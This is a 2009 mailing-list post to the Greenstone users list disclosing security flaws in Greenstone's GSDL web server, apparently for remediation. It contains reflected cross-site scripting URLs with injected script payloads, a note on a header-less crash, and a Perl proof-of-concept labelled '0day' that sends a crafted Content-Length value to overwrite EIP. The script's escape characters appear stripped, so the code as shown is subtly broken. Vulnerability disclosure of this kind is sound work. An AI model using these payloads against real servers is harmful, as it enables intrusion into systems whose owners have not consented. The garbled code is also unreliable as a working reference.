[greenstone-users] Security Issues in GSLD From: Jeremy Brown Date: Mon Sep 14 16:11:57 2009

[greenstone-users] Security Issues in GSLD

From	Jeremy Brown
Date	Mon Sep 14 16:11:57 2009
Subject	[greenstone-users] Security Issues in GSLD
Since I was told I could post this information to this list, I will continue on this route for remediation of security issues in Greenstone, particularly the GLSD. Cross Site Scripting http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&h=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&q=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E Crash when not sending headers (for example: GET / HTTP/1.1r r or even just ) GSLD Memory corruption @ content-length.. user can specify EIP in decimal notation, Proof of Concept provided: [gsld_mc.pl] #!/usr/bin/perl # gsld_mc.pl # Greenstone 2.81 GLSD Remote Memory Corruption 0day PoC # Jeremy Brown 2009 use IO::Socket; $target = "10.10.10.100"; $port = 80; $eip = 2882395322; # 0xabcddcba $payload = "GET / HTTP/1.1r " . "Host: " . $target . "r " . "Referrer: " . "r " . "Content-Length: " . $eip . "r " . "r r "; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port "; $sock->send($payload); $sock->recv($recvbuf, 512); close($sock); [/gsld_mc.pl] Thank you, Jeremy